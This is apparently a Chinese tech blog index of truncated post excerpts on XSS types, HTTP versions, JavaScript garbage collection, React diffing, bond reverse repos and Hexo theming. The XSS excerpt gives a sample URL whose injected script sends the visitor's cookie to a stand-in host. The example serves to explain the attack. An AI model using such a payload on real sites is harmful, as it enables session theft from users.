安全相关
XSS 跨站脚本攻击存储型XSS:存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie
反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。
DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Object Model,DOM)的一种漏洞,DOM-XSS是通过url传入参数去控制触发的,其实也属于反射型XSS。
Reflected XSS(基于反射的XSS攻击)主要通过利用系统反馈行为漏洞,并欺骗用户主动触发,从而发起Web攻击。
1http://you.163.com/search?keyword=<script>document.location='http://xss.com/get?cookie='+document.c ...
http相关
HTTP1.0 HTTP/1.0是无状态、无连接的应用层协议
每一次请求都需要建立一个TCP链接,服务器处理完之后立即断开连接
通过cookie/session等进行身份认证
HTTP1.0 存在问题无法复用每次发送请求,都需要进行一次tcp连接,tcp的连接释放过程比较费时,使得网络利用率较低
HTTP1.1继承自1.0 比较简单 克服了1.0部分问题
长连接新增Connection字段, 通过设置为keep-alive保持tcp通道的不中断
管道传输只要第一个请求发出去了,不必等其回来,就可以发第二个请求出去,可以减少整体的响应时间。
HTTP1.1缺陷
请求/响应头部未经压缩发送,头部信息越多延迟越大,只能压缩body部分
冗长的头部,每次发送相同的头部会造成较多浪费
队头阻塞: 服务器按照请求顺序进行响应,如果服务器响应慢,会导致客户端一直无法请求到数据
没有请求优先级控制
请求只能从客户端到服务端,服务端只能被动接受
带宽利用率不高
tcp慢启动,tcp通道建立后会先慢慢传输数据,之后逐步加快传输·
多条tcp通道会竞争带宽 造成不必要的损失 ...
浏览器相关
performance0
参考文件:
https://juejin.cn/post/7038593947995734030#heading-4
https://juejin.cn/post/6981588276356317214#heading-17
垃圾回收机制
计数清除
变量进行声明和赋值之后,值引用数+1
同一个值被赋值给另外一个变量后,值引用数+1
保存该应用值变量被覆盖/被删除后计数-1
计数为-0的可以清除
标记清除/整理
将堆内存中所有变量打上标记
从根对象进行遍历,把还在上下文中使用的变量清除标记
清理所有还有标记的变量,
垃圾回收程序清理
整理是将所有没有标记的变量向内存的一侧移动,移动完毕后剩余内存清空
v8 新旧生代
新生代存放的是小且活跃的变量,旧生代中存放大变量或不活跃的变量
Scavenge
868 208 1076
6 143
react
React diff
同级元素进行diff,如果一个dom结果在前后两次更新中跨越了层级,则不复用
不同类型的元素生成不同的树,如果元素变了,则后续节点都会销毁
通过key值暗示哪些能保持稳定
股票入门
小白入门国债逆回购正回购方(资金融入方)在将债券出质给逆回购方(资金融出方)融入资金的同时,双方约定在将来某一指定日期,由正回购方按约定回购利率计算的资金额向逆回购方返回资金,逆回购方向正回购方返回原出质债券的融资行为。
通俗来说,有资金的一方(逆回购方)将钱融给需要资金的一方(正回购方,他需要质押债券才可以融资),到期向正回购方收取一定的利息。
在月末,季末,长假之前,收益率有可能会大幅提高
hexo入门 & butterfly魔改
新建文章1hexo new [layout] <titie>
布局
路径
post
source/_posts
page
source
draft
source/_drafts
参数
描述
-p
–path 自定义新文章路径
-r
–replace 如果存在同名文章,将其替换
-s
–slug 文章的 Slug,作为新文章的文件名和发布后的 URL
新建文件默认地址: 2024/03/18/hexo入门/permalink:2024/03/18/hexo入门/
butterfly添加自定义js、css文件推荐在根目录的source文件夹种配置,通过配置文件将
123456# _config.butterfly.yml inject: head: # - <link rel="stylesheet" href="/xxx.css"> bottom: - < ...